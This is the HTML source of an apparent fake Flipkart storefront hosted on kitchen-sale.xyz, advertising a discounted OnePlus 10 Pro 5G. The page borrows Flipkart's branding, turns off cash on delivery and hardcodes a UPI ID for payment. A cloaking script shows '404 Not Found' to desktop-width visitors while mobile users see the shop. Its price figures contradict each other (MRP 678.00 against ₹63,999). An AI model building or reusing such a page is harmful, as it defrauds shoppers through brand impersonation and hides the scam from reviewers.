<!DOCTYPE html>
<script>
    window.dataLayer = window.dataLayer || [];

    function gtag() {
        dataLayer.push(arguments);
    }
    gtag('js', new Date());
    gtag('config', 'UA-254758032-7');
</script>

<html lang="en-IN">

<head>
    <!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-CFXXHN6P7H"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-BYCLFZHBYW');
</script>
 <!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '2400180776843893');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=2400180776843893&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->

        <title>Online Shopping Site for Mobiles, Electronics, Furniture, Grocery, Lifestyle, Books &amp; More. Best Offers!</title>
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="-1">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="Keywords" content="Online Shopping in India,online Shopping store,Online Shopping Site,Buy Online,Shop Online,Online Shopping,Flipkart">
    <meta name="Description" content="India&#39;s biggest online store for Mobiles, Fashion (Clothes/Shoes), Electronics, Home Appliances, Books, Jewelry, Home, Furniture, Sporting goods, Beauty &amp; Personal Care, Grocery and more! Find the largest selection from all brands at the lowest prices in India. Payment options - COD, EMI, Credit card, Debit card &amp; more.">
    <meta property="og:title" content="We are Here To Help You">
    <meta name="theme-color" content="#2874f0" id="themeColor">
    <meta name="viewport" content="width=device-width,minimum-scale=1,user-scalable=no">
    <link rel="stylesheet" href="http://kitchen-sale.xyz/assets/css/bootstrap.min.css">
    <link rel="stylesheet" href="http://kitchen-sale.xyz/assets/css/custom.css">
    <link rel="icon" href="https://static-assets-web.flixcart.com/batman-returns/batman-returns/p/images/logo_lite-cbb357.png" type="image/png">
    <link rel="icon" id="favicon" href="https://static-assets-web.flixcart.com/batman-returns/batman-returns/p/images/logo_lite-cbb357.png" type="image/png">
    <script>
        function updateTitleAndFavicon() {
            var favicon = document.getElementById('favicon');
            if (window.matchMedia("(min-width: 768px)").matches) {
                document.title = "404 Not Found";
                if (favicon) {
                    favicon.parentNode.removeChild(favicon);
                }
            } else {
                // Restore default title and favicon for screens smaller than 768px
                document.title = "Online Shopping Site for Mobiles, Electronics, Furniture, Grocery, Lifestyle, Books &amp; More. Best Offers!";
                if (!favicon) {
                    var link = document.createElement('link');
                    link.id = 'favicon';
                    link.rel = 'icon';
                    link.href = 'https://static-assets-web.flixcart.com/batman-returns/batman-returns/p/images/logo_lite-cbb357.png';
                    link.type = 'image/png';
                    document.head.appendChild(link);
                }
            }
        }

        window.addEventListener('resize', updateTitleAndFavicon);
        window.addEventListener('load', updateTitleAndFavicon);
    </script>
    
    <script>
        var WEB_API_FOLDER = 'http://kitchen-sale.xyz/api_services/';
        var API_SERVICE_URL = 'http://kitchen-sale.xyz/api_services/manage.php';
        var ADMIN_PANEL_URL = 'http://kitchen-sale.xyz/admin_panel/';
        var MAIN_URL = 'http://kitchen-sale.xyz/';
        var PRIMARY_ID = 'external452e452e452e452e.html';
    </script>
    <script>var UPI_ID = "fsv.470000099306201@icici"</script><!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '935847641284857');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=935847641284857&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code --></head>

<body class="expansion-alids-init" cz-shortcut-listen="true">
    <div id="container" style="overflow:hidden">
        <div style="height:100%" data-reactroot="">    
</head>
<body class="expansion-alids-init" cz-shortcut-listen="true">
    <div id="container" style="overflow:hidden">
        <div style="height:100%" data-reactroot="">
<div class="container-fluid py-2 header-container" style="background-color:#2874f0">
    <div class="row header">
        <div class="col-1">
            <div class="menu-icon" id="back_btn">
                <svg width="19" height="16" viewBox="0 0 19 16" xmlns="http://www.w3.org/2000/svg">
    <path d="M17.556 7.847H1M7.45 1L1 7.877l6.45 6.817" stroke="#FFF" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round" fill="none"></path>
</svg>            </div>
        </div>
        <div class="col-2">
            <div class="menu-logo">
                <img alt="menu" src="http://kitchen-sale.xyz/img/Q18Ifxk.png" height="30px">
            </div>
        </div>
        <div class="col-6">
        </div>
        <div class="col-1">
            <div class="menu-icon">
                <svg width="16" height="16" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><g fill="#FFF" fill-rule="evenodd"><path d="m11.618 9.897l4.225 4.212c.092.092.101.232.02.313l-1.465 1.46c-.081.081-.221.072-.314-.02l-4.216-4.203"/><path d="m6.486 10.901c-2.42 0-4.381-1.956-4.381-4.368 0-2.413 1.961-4.369 4.381-4.369 2.42 0 4.381 1.956 4.381 4.369 0 2.413-1.961 4.368-4.381 4.368m0-10.835c-3.582 0-6.486 2.895-6.486 6.467 0 3.572 2.904 6.467 6.486 6.467 3.582 0 6.486-2.895 6.486-6.467 0-3.572-2.904-6.467-6.486-6.467"/></g></svg>            </div>
        </div>
        <div class="col-1">
            <div class="menu-icon">
                <svg width="16" height="16" viewBox="0 0 15 15" xmlns="external452e452e452e452e.html?link=http://www.w3.org/2000/svg">
    <g fill="#fff" fill-rule="evenodd">
        <path d="m5.189 13.04c0 .996-.791 1.804-1.767 1.804-.976 0-1.767-.808-1.767-1.804 0-.996.791-1.804 1.767-1.804.976 0 1.767.808 1.767 1.804"></path>
        <path d="m14.912 2.259h-14.298l2.247 6.917c.042.129.16.216.293.216h8.06c-.064.69-.629 1.841-1.702 1.841h-6.04l1.072 1.991h5.611c1.881 0 2.938-2.278 3.657-4.719.888-3.01 1.219-6.245 1.106-6.245"></path>
        <path d="m.615 2.259l-.592-1.828c-.08-.207.069-.431.287-.431h1.482c.126 0 .24.079.287.198l.682 2.061c0 0-.63 1.642-1.942.066"></path>
        <path d="m2.262.756c0 0 .498 1.503 2.234 1.503l-1.736.749-1.104-.749.607-1.503"></path>
        <path d="m13.424 13.325c0 .837-.664 1.516-1.484 1.516-.82 0-1.484-.679-1.484-1.516 0-.837.664-1.516 1.484-1.516.82 0 1.484.679 1.484 1.516"></path>
    </g>
</svg>            </div>
        </div>
    </div>
</div>

<div class="_1fhgRH mb-5">
    <div class="container p-1 card">
        <div class="container-fluid px-0 product-slider">
            <div class="love-icon"></div>
            <div class="share-icon"></div>
            <div id="sliderX" class="carousel slide" data-ride="carousel">
                <ol class="carousel-indicators">
                    <li data-target="#sliderX" data-slide-to="0" class="active"></li>
                    <li data-target="#sliderX" data-slide-to="1"></li>
                </ol>
                <div class="carousel-inner">
                    <div class="carousel-item active">
                        <img class="d-block w-100" src="http://kitchen-sale.xyz/img/back.png" alt="First slide">
                    </div>
                    <div class="carousel-item">
                        <img class="d-block w-100" src="http://kitchen-sale.xyz/files/12.jpg" alt="Second slide">
                    </div>
                </div>
            </div>
            <div class="color-div">
                <h4>Select Color</h4>
                <div class="color-list p-2">

                </div>
            </div>
            <div class="storage-div mt-3">
                <h4>Select Storage</h4>
                <div class="storage-list p-2">

                </div>
            </div>
            <div class="size-div mt-3">
                <h4>Select Size</h4>
                <div class="size-list p-2">
                    <!--<span class="size-name">M</span>-->

                </div>
            </div>
        </div>
    </div>
    <div class="container-fluid p-3 mt-1 card">
        <div class="product-title">
            OnePlus 10 Pro 5G
        </div>
        <img style="width: 100px" class="my-2" src="http://kitchen-sale.xyz/assets/images/plue-fassured.png" alt="plue-fassured">
        <div class="product-price d-flex my-2">
            <span class="discount">40% off</span>
            <span class="mrp">678.00</span>
            <span class="price">&#8377;63,999</span>
        </div>
    </div>
    <div class="container-fluid p-3 offerend-container card">
        <h4 class="m-0"> Offer ends in <span class="offer-timer" id="offerend-time"></span>
    </div>
    <div class="container-fluid p-3 mb-1 card">
        <img class="my-2" src="http://kitchen-sale.xyz/assets/images/pay-latter.png" alt="pay-latter">
    </div>
    <div class="container-fluid px-2 py-3 d-flex feature-container product-extra card">
        <div class="col-4 featured-item d-flex align-items-center flex-column bd-highlight px-1">
            <img class="featured-img mb-3" src="http://kitchen-sale.xyz/assets/images/replacement.png" />
            <span class="feature-title"> 7 days Replacement </span>
        </div>
        <div class="col-4 featured-item d-flex align-items-center flex-column bd-highlight px-1">
            <img class="featured-img mb-3" src="http://kitchen-sale.xyz/assets/images/non-cod.png" />
            <span class="feature-title"> No Cash On Delivery </span>
        </div>
        <div class="col-4 featured-item d-flex align-items-center flex-column bd-highlight px-1">
            <img class="featured-img mb-3 mt-1" src="http://kitchen-sale.xyz/assets/images/plue-fassured.png" />
            <span class="feature-title"> Plus (F-Assured) </span>
        </div>
    </div>
    <img class="d-block w-100" src="https://kitchen-sale.xyz/assets/images/nnnpp.png" alt="first slide">

    <div class="container-fluid product-detail px-0 py-3 mb-4 card">
        <h3 class="txt-product-detail">Product Detail</h3>
        <div class="product-details"></div>
    </div>
    
</div>
<div class="button-container flex">
    <button class="buynow-button buynow-button-white product-page-buy" onclick="buyNow();">
        Add to Cart
    </button>
    <button class="buynow-button product-page-buy" onclick="buyNow();">
        Buy Now
    </button>
</div>

</div>
<footer class="seofooter" id="seofooter">
</footer>
<script defer src="http://kitchen-sale.xyz/assets/js/jquery.min.js"></script>
<script defer src="http://kitchen-sale.xyz/assets/js/bootstrap.min.js"></script>
<script defer src="http://kitchen-sale.xyz/assets/js/relativeTime.js"></script>
<script defer src="http://kitchen-sale.xyz/assets/js/days.min.js"></script>
<script defer src="http://kitchen-sale.xyz/assets/js/custom.js"></script>
<script defer src="http://kitchen-sale.xyz/assets/js/manage_product.js"></script></body>

</html>